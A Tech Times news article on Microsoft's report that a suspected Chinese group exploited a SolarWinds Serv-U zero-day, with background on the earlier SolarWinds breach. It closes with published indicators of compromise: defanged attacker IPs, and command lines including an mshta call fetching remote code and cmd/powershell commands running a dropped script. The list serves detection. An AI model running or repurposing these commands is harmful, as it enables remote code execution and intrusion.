SolarWinds attack has been one of the headaches that tech companies have encountered, especially over the past months. This time, Microsoft spotted that a group of Chinese hackers was installing zero-day to exploit vulnerabilities in SolarWinds.
If this happens, the software company might be at the brink of malware infection, which would result in data alteration or theft.
Microsoft Notes the Most Recent SolarWinds Attack
According to the company's blog on Tuesday, July 13, the suspected hackers from China were exploiting SolarWinds in an attempt to take down its systems. The same group was also discovered to be hitting several sectors across the United States.
Mainly, cybercriminals have been targeting important systems in the military research and development sector.
For the initial status of the operation, Microsoft aims to recognize the identity of the group behind the attack. The Redmond giant named the actor DEV-0322 since it has not yet known the whereabouts of the attackers.
Microsoft said that the group has been actively moving through the systems using a commercial VPN and routers for their cyberattacks. The company said that it has now informed the affected organizations about the latest hack.
Read Also : Microsoft Catches NOBELIUM's Email Malware Plans, Also Known for its Part in SolarWinds' Attack
Microsoft Notifies SolarWinds About the Attack
In an updated statement, SolarWinds said that Microsoft tapped it after learning that the suspected Chinese hackers made their way out of the Serv-U software. The attack was linked to the patched FTP and product file transfer.
Back in December, SolarWinds was featured in several headlines due to the controversial cyberattack that happened. At that time, the experts said that the company's password was weak, which is why the hackers could easily access its systems.
Following the case of the solarwinds123 passcode, some experts believed that the vulnerability of the software giant was not dependent on its easy password.
Huntress co-founder Kylve Hanslovan said that one of the reasons why SolarWinds is easy to penetrate was because of the "malicious updates" that lived in the system for many days.
The following month after the incident with SolarWinds' password, the US intelligence boldly named Russia behind the attacks on the company. The authorities also believed that the hackers wanted to compromise many US computers at that time.
Microsoft Provides Indicators For SolarWinds Attack
Ars Technica reported that Microsoft revealed the possible indicators that people can encounter. The following will be the indicators that will tell you if your computer is exposed to hacking.
98[.]176[.]196[.]89
68[.]235[.]178[.]32
208[.]113[.]35[.]58
144[.]34[.]179[.]162
97[.]77[.]97[.]58
hxxp://144[.]34[.]179[.]162/a
C:WindowsTempServ-U.bat
C:WindowsTemptestcurrent.dmp
The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
C:WindowsSystem32mshta.exe https://144[.]34[.]179[.]162/a (defanged)
cmd.exe /c whoami > "./Client/Common/redacted.txt"
cmd.exe /c dir > ".ClientCommonredacted.txt"
cmd.exe /c "C:WindowsTempServ-U.bat"
powershell.exe C:WindowsTempServ-U.bat
cmd.exe /c type redactedredacted.Archive > "C:ProgramDataRhinoSoftServ-UUsersGlobal Usersredacted.Archive"
Recently, Microsoft released an emergency patch update for the PrintNightmare Zero-Day vulnerability. However, the said update was unable to fully fix the issue.
Related Article : SolarWinds Hackers Attack More Government Agencies and NGOs Globally, Microsoft Says
This article is owned by Tech Times
Written by Joseph Henry